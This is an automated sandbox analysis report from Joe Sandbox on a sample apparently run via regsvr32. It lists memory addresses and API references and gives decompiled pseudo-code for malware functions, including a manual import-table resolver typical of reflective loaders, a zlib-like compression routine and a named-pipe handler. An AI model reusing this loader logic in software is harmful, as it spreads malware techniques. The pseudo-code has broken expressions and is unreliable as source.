                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3992
                                                                                                                                                                                              0x04af3996
                                                                                                                                                                                              0x04af399b
                                                                                                                                                                                              0x04af399f
                                                                                                                                                                                              0x04af39a3
                                                                                                                                                                                              0x04af39a5
                                                                                                                                                                                              0x04af39ad
                                                                                                                                                                                              0x04af39b3
                                                                                                                                                                                              0x04af39b7
                                                                                                                                                                                              0x04af39bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af39bb
                                                                                                                                                                                              0x04af380a
                                                                                                                                                                                              0x04af396c
                                                                                                                                                                                              0x04af384c
                                                                                                                                                                                              0x04af384d
                                                                                                                                                                                              0x04af384f
                                                                                                                                                                                              0x04af3857
                                                                                                                                                                                              0x04af3858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3858
                                                                                                                                                                                              0x04af3851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3851
                                                                                                                                                                                              0x04af3810
                                                                                                                                                                                              0x04af3813
                                                                                                                                                                                              0x04af388f
                                                                                                                                                                                              0x04af3891
                                                                                                                                                                                              0x04af3897
                                                                                                                                                                                              0x04af3899
                                                                                                                                                                                              0x04af3936
                                                                                                                                                                                              0x04af3936
                                                                                                                                                                                              0x04af3948
                                                                                                                                                                                              0x04af394e
                                                                                                                                                                                              0x04af3957
                                                                                                                                                                                              0x04af3958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3958
                                                                                                                                                                                              0x04af389f
                                                                                                                                                                                              0x04af38a3
                                                                                                                                                                                              0x04af38a6
                                                                                                                                                                                              0x04af392a
                                                                                                                                                                                              0x04af392f
                                                                                                                                                                                              0x04af3932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3932
                                                                                                                                                                                              0x04af38a8
                                                                                                                                                                                              0x04af38ab
                                                                                                                                                                                              0x04af38b3
                                                                                                                                                                                              0x04af38b8
                                                                                                                                                                                              0x04af38bd
                                                                                                                                                                                              0x04af38bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af38c3
                                                                                                                                                                                              0x04af38c4
                                                                                                                                                                                              0x04af38c6
                                                                                                                                                                                              0x04af38f5
                                                                                                                                                                                              0x04af3904
                                                                                                                                                                                              0x04af3909
                                                                                                                                                                                              0x04af390c
                                                                                                                                                                                              0x04af3918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3918
                                                                                                                                                                                              0x04af38c8
                                                                                                                                                                                              0x04af38cc
                                                                                                                                                                                              0x04af38da
                                                                                                                                                                                              0x04af38df
                                                                                                                                                                                              0x04af38e3
                                                                                                                                                                                              0x04af38e4
                                                                                                                                                                                              0x04af38e9
                                                                                                                                                                                              0x04af38ed
                                                                                                                                                                                              0x04af38ed
                                                                                                                                                                                              0x04af38f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af38f1
                                                                                                                                                                                              0x04af3815
                                                                                                                                                                                              0x04af3818
                                                                                                                                                                                              0x04af3860
                                                                                                                                                                                              0x04af3861
                                                                                                                                                                                              0x04af3864
                                                                                                                                                                                              0x04af386c
                                                                                                                                                                                              0x04af3871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3871
                                                                                                                                                                                              0x04af381b
                                                                                                                                                                                              0x04af381e
                                                                                                                                                                                              0x04af3847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af3847
                                                                                                                                                                                              0x04af3823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af382e
                                                                                                                                                                                              0x04af37e7
                                                                                                                                                                                              0x04af3b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 04AF37B2
                                                                                                                                                                                                • Part of subcall function 04AFD1A6: FlushFileBuffers.KERNEL32(00000000,?,04AF3AC6,00000000,00000004), ref: 04AFD1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 04AF3B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 760b3c264ac0d8b6b1d87e23979eea38b9818142bb6d32ed3459fa65ab20067a
                                                                                                                                                                                              • Instruction ID: 6fb3c8b65d631f3339418d5bac79ff77799b4051c1d5d3efa1615d850d67fb2f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 760b3c264ac0d8b6b1d87e23979eea38b9818142bb6d32ed3459fa65ab20067a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AA1E4B1608301AFE714EFA5DD84E6BB7E8EB84314F40891EFB5597280EB34E944CB51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B0370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E04B0370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E04AFEFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                                              0x04b0370b
                                                                                                                                                                                              0x04b03711
                                                                                                                                                                                              0x04b03719
                                                                                                                                                                                              0x04b0372e
                                                                                                                                                                                              0x04b03740
                                                                                                                                                                                              0x04b0374c
                                                                                                                                                                                              0x04b03752
                                                                                                                                                                                              0x04b03757
                                                                                                                                                                                              0x04b03763
                                                                                                                                                                                              0x04b038ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b038ce
                                                                                                                                                                                              0x04b03769
                                                                                                                                                                                              0x04b03772
                                                                                                                                                                                              0x04b03780
                                                                                                                                                                                              0x04b03783
                                                                                                                                                                                              0x04b03792
                                                                                                                                                                                              0x04b03792
                                                                                                                                                                                              0x04b03799
                                                                                                                                                                                              0x04b037a7
                                                                                                                                                                                              0x04b037aa
                                                                                                                                                                                              0x04b037ba
                                                                                                                                                                                              0x04b037c7
                                                                                                                                                                                              0x04b037ce
                                                                                                                                                                                              0x04b037de
                                                                                                                                                                                              0x04b037f0
                                                                                                                                                                                              0x04b037f6
                                                                                                                                                                                              0x04b037e0
                                                                                                                                                                                              0x04b037e8
                                                                                                                                                                                              0x04b037e8
                                                                                                                                                                                              0x04b037f9
                                                                                                                                                                                              0x04b037fd
                                                                                                                                                                                              0x04b03809
                                                                                                                                                                                              0x04b0380d
                                                                                                                                                                                              0x04b03811
                                                                                                                                                                                              0x04b03815
                                                                                                                                                                                              0x04b03821
                                                                                                                                                                                              0x04b0384c
                                                                                                                                                                                              0x04b03854
                                                                                                                                                                                              0x04b0385a
                                                                                                                                                                                              0x04b03866
                                                                                                                                                                                              0x04b03872
                                                                                                                                                                                              0x04b03823
                                                                                                                                                                                              0x04b03828
                                                                                                                                                                                              0x04b03833
                                                                                                                                                                                              0x04b0383f
                                                                                                                                                                                              0x04b0383f
                                                                                                                                                                                              0x04b0387b
                                                                                                                                                                                              0x04b03881
                                                                                                                                                                                              0x04b0388b
                                                                                                                                                                                              0x04b038a7
                                                                                                                                                                                              0x04b0388d
                                                                                                                                                                                              0x04b03890
                                                                                                                                                                                              0x04b0389c
                                                                                                                                                                                              0x04b0389c
                                                                                                                                                                                              0x04b0388b
                                                                                                                                                                                              0x04b038af
                                                                                                                                                                                              0x04b038b8
                                                                                                                                                                                              0x04b038b8
                                                                                                                                                                                              0x04b038c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b038c6
                                                                                                                                                                                              0x04b037d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b037d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b037aa
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 04B03728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 04B037C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: baf2a4f5c5bc7b57107822705da8015579d154a0a26568773fe8a1369a778783
                                                                                                                                                                                              • Instruction ID: 443ed4ff96d4a4aa48e725857071abbc4ef6105336cd02c1c4afb21cb6f41c48
                                                                                                                                                                                              • Opcode Fuzzy Hash: baf2a4f5c5bc7b57107822705da8015579d154a0a26568773fe8a1369a778783
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E618EB5E10209EFDB10CF98C485BADBBF1FF48316F248599E815AB291D774AA80DF50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04B04100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E04B04100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E04B07120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E04B05E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E04B05FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E04B05FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E04B07120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E04B05E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                                              0x04b04106
                                                                                                                                                                                              0x04b0410b
                                                                                                                                                                                              0x04b0410f
                                                                                                                                                                                              0x04b04112
                                                                                                                                                                                              0x04b04112
                                                                                                                                                                                              0x04b04115
                                                                                                                                                                                              0x04b0411a
                                                                                                                                                                                              0x04b0411f
                                                                                                                                                                                              0x04b04122
                                                                                                                                                                                              0x04b04127
                                                                                                                                                                                              0x04b0412a
                                                                                                                                                                                              0x04b04130
                                                                                                                                                                                              0x04b04130
                                                                                                                                                                                              0x04b0413b
                                                                                                                                                                                              0x04b0413e
                                                                                                                                                                                              0x04b04145
                                                                                                                                                                                              0x04b0414a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04150
                                                                                                                                                                                              0x04b04155
                                                                                                                                                                                              0x04b04155
                                                                                                                                                                                              0x04b0415a
                                                                                                                                                                                              0x04b04160
                                                                                                                                                                                              0x04b0416a
                                                                                                                                                                                              0x04b0416f
                                                                                                                                                                                              0x04b04175
                                                                                                                                                                                              0x04b04194
                                                                                                                                                                                              0x04b04197
                                                                                                                                                                                              0x04b041a2
                                                                                                                                                                                              0x04b041a2
                                                                                                                                                                                              0x04b041a2
                                                                                                                                                                                              0x04b04199
                                                                                                                                                                                              0x04b04199
                                                                                                                                                                                              0x04b0419b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b0419d
                                                                                                                                                                                              0x04b0419d
                                                                                                                                                                                              0x04b0419d
                                                                                                                                                                                              0x04b0419b
                                                                                                                                                                                              0x04b041aa
                                                                                                                                                                                              0x04b041af
                                                                                                                                                                                              0x04b041b4
                                                                                                                                                                                              0x04b041ba
                                                                                                                                                                                              0x04b041be
                                                                                                                                                                                              0x04b041c1
                                                                                                                                                                                              0x04b041c4
                                                                                                                                                                                              0x04b041ca
                                                                                                                                                                                              0x04b041cf
                                                                                                                                                                                              0x04b041d2
                                                                                                                                                                                              0x04b041d8
                                                                                                                                                                                              0x04b041dd
                                                                                                                                                                                              0x04b041e3
                                                                                                                                                                                              0x04b041e9
                                                                                                                                                                                              0x04b041ee
                                                                                                                                                                                              0x04b041f1
                                                                                                                                                                                              0x04b041f6
                                                                                                                                                                                              0x04b041fa
                                                                                                                                                                                              0x04b041fe
                                                                                                                                                                                              0x04b04201
                                                                                                                                                                                              0x04b04204
                                                                                                                                                                                              0x04b0420d
                                                                                                                                                                                              0x04b04214
                                                                                                                                                                                              0x04b04217
                                                                                                                                                                                              0x04b0421a
                                                                                                                                                                                              0x04b0421f
                                                                                                                                                                                              0x04b04224
                                                                                                                                                                                              0x04b04227
                                                                                                                                                                                              0x04b0422a
                                                                                                                                                                                              0x04b0422a
                                                                                                                                                                                              0x04b0422e
                                                                                                                                                                                              0x04b04237
                                                                                                                                                                                              0x04b0423e
                                                                                                                                                                                              0x04b04241
                                                                                                                                                                                              0x04b04246
                                                                                                                                                                                              0x04b0424b
                                                                                                                                                                                              0x04b0424b
                                                                                                                                                                                              0x04b0424e
                                                                                                                                                                                              0x04b04253
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04177
                                                                                                                                                                                              0x04b04179
                                                                                                                                                                                              0x04b04186
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04186
                                                                                                                                                                                              0x04b04179
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04b04175
                                                                                                                                                                                              0x04b04259
                                                                                                                                                                                              0x04b0425e
                                                                                                                                                                                              0x04b04261
                                                                                                                                                                                              0x04b04264
                                                                                                                                                                                              0x04b0430f
                                                                                                                                                                                              0x04b0430f
                                                                                                                                                                                              0x04b0426a
                                                                                                                                                                                              0x04b0426a
                                                                                                                                                                                              0x04b0426a
                                                                                                                                                                                              0x04b0426f
                                                                                                                                                                                              0x04b04299
                                                                                                                                                                                              0x04b0429c
                                                                                                                                                                                              0x04b0429c
                                                                                                                                                                                              0x04b042a1
                                                                                                                                                                                              0x04b042a3
                                                                                                                                                                                              0x04b042a5
                                                                                                                                                                                              0x04b042a8
                                                                                                                                                                                              0x04b042ab
                                                                                                                                                                                              0x04b042b3
                                                                                                                                                                                              0x04b042b8
                                                                                                                                                                                              0x04b042b8
                                                                                                                                                                                              0x04b042be
                                                                                                                                                                                              0x04b042c1
                                                                                                                                                                                              0x04b042c4
                                                                                                                                                                                              0x04b042c7
                                                                                                                                                                                              0x04b042c9
                                                                                                                                                                                              0x04b042c9
                                                                                                                                                                                              0x04b042ca
                                                                                                                                                                                              0x04b042ca
                                                                                                                                                                                              0x04b042c7
                                                                                                                                                                                              0x04b042d8
                                                                                                                                                                                              0x04b042db
                                                                                                                                                                                              0x04b042df
                                                                                                                                                                                              0x04b042e4
                                                                                                                                                                                              0x04b042e7
                                                                                                                                                                                              0x04b042ea
                                                                                                                                                                                              0x04b042ea
                                                                                                                                                                                              0x04b042ea
                                                                                                                                                                                              0x04b042ed
                                                                                                                                                                                              0x04b042ed
                                                                                                                                                                                              0x04b042f0
                                                                                                                                                                                              0x04b042f0
                                                                                                                                                                                              0x04b04271
                                                                                                                                                                                              0x04b04271
                                                                                                                                                                                              0x04b04281
                                                                                                                                                                                              0x04b04284
                                                                                                                                                                                              0x04b04289
                                                                                                                                                                                              0x04b04289
                                                                                                                                                                                              0x04b0428c
                                                                                                                                                                                              0x04b0428f
                                                                                                                                                                                              0x04b04292
                                                                                                                                                                                              0x04b04294
                                                                                                                                                                                              0x04b04294
                                                                                                                                                                                              0x04b042f3
